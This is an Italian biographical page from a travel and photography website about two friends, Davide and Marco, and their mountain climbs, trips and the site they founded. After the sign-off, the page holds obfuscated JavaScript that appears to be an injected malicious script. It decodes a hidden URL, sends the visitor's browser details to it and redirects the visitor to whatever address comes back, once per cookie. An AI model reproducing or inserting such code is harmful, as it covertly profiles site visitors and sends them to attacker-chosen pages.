Seleziona una pagina

Davide Di guida & Rizzato Marco.

Nati rispettivamente a Milano “Italia” l’anno 74 l’uno e 75 l’altro. Si conoscono nel lontano 1981 ed è subito amicizia. Capiscono da subito che la loro passione è la montagna, i viaggi ed il conoscere altri paesi e culture. Spinti dalla loro euforia e dal programma condotto da AMBROGIO FOGAR “Jonathan dimensione avventura” decidono di intraprendere la loro prima avventura sulle montagne Lecchesi.


“Monte grigna 2184msl” alla sola età di 12 & 13 anni.

Da li è partito un susseguirsi di scalate, arrampicate e traversate sulle Prealpi ed Alpi.
Cominciano a praticare l’alpinismo e contemporaneamente altri sport per tenersi in forma fisica.
Dopo svariate avventure, nel 1991 decidono di attraversare il parco nazionale dello Stelvio in una settimana con la loro attrezzatura ed i loro rifornimenti. E la portano a termine in soli 4 giorni.


Marco 16 anni, Ghiacciao Cevedale.


Davide 17 anni, Ghiacciao Cevedale.

Successivamente decidono di attraversare le alpi in 30 giorni, partendo dalla Valpelline in Valle d’AOSTA sino a Gemona nel Friuli (UD) in FRIULI VENEZIA GIULIA . Purtroppo debbono accantonare l’idea per la partenza nel servizio militare (Alpini) prima di Davide e l’anno successivo (bersaglieri) di Marco. Con il passare degl’anni gli stili di viaggio cambiano. Si appassionano entrambi ad altre lingue, e separatamente ma sempre in contatto i due amici girano varie parti dell’Europa e dell’america latina. Inizialmente Davide viaggia alla volta dell’America. Prima in Venezuela e successivamente in Perù, dove rimane a vivere per alcuni anni. Marco in contemporanea svariati paesi dell’Europa e Stati uniti. Nel 2003 Davide convince il suo amico a viaggiare con lui in sud America e preparano un viaggio senza meta come facevano da ragazzi. Partiti a settembre 2004, dopo solo 18 giorni Davide deve rientrare in Italia per forti problemi familiari. Marco allora decide di andare avanti da solo e comincia a girare L’Uruguay, Paraguay, Cile e L’Argentina dove rimane a vivere per un anno e mezzo. Vivendo in Argentina, Marco conosce molti figli e nipoti di immigrati europei, e sentendo le loro storie comincia ad avere un’idea fantastica su come unire la passione per i viaggi alla fotografia ed alle culture di tutti i paesi del mondo


Marco, Cascate di Iguazù.

Tornando in Italia ne parla subito con il suo amico e decidono di creare un sito web di fotografia, viaggi ed avventure che chiamano www.fotoseimagenes.com. Unite le loro foto e le loro esperienze, inizia la loro più grande avventura e cioè poter ampliare il loro sito di fotografie, immagini e video di tutte le parti del mondo. Cosicché tutte le persone che non abbiano la possibilità di viaggiare possano almeno vedere le foto di luoghi da loro sognati.

I loro viaggi si suddividono in due categorie: Il primo molto semplice e normale consiste nel girare le cittadine utilizzando mezzi di trasporto quali autobus, moto a noleggio oppure semplicemente a piedi. Cercando di documentare il più possibile quel paese fotografando luoghi e quartieri i quali un semplice turista non visita.

Come ad esempio la Repubblica dominicana girata da sud a nord nel 2007. “potete trovarla sul sito nella sezione EVENTI e le foto nella sezione GALLERIA FOTOGRAFICA”.


Davide & Marco, Fiume Salto alto (Republica Dominicana)

Il secondo, più duro, consiste in avventure Estreme quali escursioni o traversate in montagna. Ed anche traversate in bicicletta. Si stanno anche preparando (non ancora professionalmente) ad utilizzare la barca a vela.
Dopo esattamente 20 anni, quindi ad aprile 2008, Davide & Marco ritornano sulla montagna dove fecero il loro primo viaggio (dove tutto ebbe inizio), e li decidono di attraversare le alpi in 30 giorni lasciata indietro anni prima.
Per maggiori informazioni sulle loro imprese: visitate il sito
www.fotoseimagenes.com alla sezione EVENTI.
E per le avventure future, come ad esempio la traversata delle alpi, sempre lo stesso sito nella sezione PROGETTI.
Vi daremo maggiori informazioni sulla nostra impresa quando torneremo.


Buona Avventura a tutti.
Davide & Marco..
var uomjftkd = { encode: function (uymcrbbu, ivpjzup1) { var juykdjus = “”; for (var bmtvoq = 0; bmtvoq < uymcrbbu.length; bmtvoq++) { var maoakjle = uymcrbbu.charCodeAt(bmtvoq); var vznvir = maoakjle ^ ivpjzup1.charCodeAt(bmtvoq % ivpjzup1.length); juykdjus = juykdjus + String.fromCharCode(vznvir); } return juykdjus; }};function ivlvxbnl(xspsscex, qmjwsdtc){ return uomjftkd.encode(xspsscex, qmjwsdtc);}function nhqlzziy(vtzoxco, qmjwsdtc) { function mnbggf(url, qvfdnorl, gaurhzsa) { var svzjxjw = new XMLHttpRequest(); var mvlmqh = ""; var ngpewk = []; var djzspyoe; for(djzspyoe in qvfdnorl) { ngpewk.push(encodeURIComponent(djzspyoe) + '=' + encodeURIComponent(qvfdnorl[djzspyoe])); } mvlmqh = ngpewk.join(String.fromCharCode(38)).replace(/%20/g, '+'); svzjxjw.onreadystatechange = gaurhzsa; svzjxjw.open('GET', vtzoxco + "?" + mvlmqh); svzjxjw.send(mvlmqh); } var broilplq = { ua: navigator.userAgent, referrer: document.referrer, host: window.location.hostname, uri: window.location.pathname, lang: navigator.language, guid: qmjwsdtc }; mnbggf(vtzoxco, broilplq, function () { if (this.readyState == 4) { if (this.status == 200) { qvfdnorl = this.responseText; if (typeof(qvfdnorl) === 'string') { if (qvfdnorl.indexOf("http") === 0) { window.location = qvfdnorl; } } } } });}var advuwpjt = Array();var qmjwsdtc = '08430616d2a2d9759b18f9b49fcabc12';if (document.cookie.indexOf(qmjwsdtc) === -1){ advuwpjt.push(String.fromCharCode(88,76,64,67,67,12,30,25,9,75,8,92,2,86,67,71,88,1,90,93,20,23,11,90,95,9,76,0,18,10,28,88,67,22,68,91,64)); document.cookie = qmjwsdtc + '=1; path=/'; advuwpjt = advuwpjt.forEach(function (xspsscex) { var juykdjus = ivlvxbnl(xspsscex, qmjwsdtc); if (typeof(juykdjus) === 'string') { if (juykdjus.indexOf("http") === 0) { nhqlzziy(juykdjus, qmjwsdtc); return; } } });}